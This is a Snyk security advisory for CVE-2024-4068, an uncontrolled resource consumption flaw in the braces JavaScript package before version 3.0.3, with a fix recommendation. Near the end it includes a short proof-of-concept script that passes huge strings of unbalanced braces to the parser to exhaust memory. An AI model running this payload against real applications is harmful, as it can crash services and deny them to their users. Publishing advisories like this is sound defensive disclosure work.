Uncontrolled resource consumption Affecting braces package, versions <3.0.3


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.05% (18th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Uncontrolled resource consumption vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-BRACES-6838727
  • published13 May 2024
  • disclosed13 May 2024
  • creditMário Teixeira

Introduced: 13 May 2024

CVE-2024-4068  (opens in a new tab)
CWE-400  (opens in a new tab)

How to fix?

Upgrade braces to version 3.0.3 or higher.

Overview

braces is a Bash-like brace expansion, implemented in JavaScript.

Affected versions of this package are vulnerable to Uncontrolled resource consumption due improper limitation of the number of characters it can handle, through the parse function. An attacker can cause the application to allocate excessive memory and potentially crash by sending imbalanced braces as input.

PoC

const { braces } = require('micromatch');

console.log("Executing payloads...");

const maxRepeats = 10;

for (let repeats = 1; repeats <= maxRepeats; repeats += 1) {
  const payload = '{'.repeat(repeats*90000);

  console.log(`Testing with ${repeats} repeats...`);
  const startTime = Date.now();
  braces(payload);
  const endTime = Date.now();
  const executionTime = endTime - startTime;
  console.log(`Regex executed in ${executionTime / 1000}s.\n`);
} 

CVSS Scores

version 3.1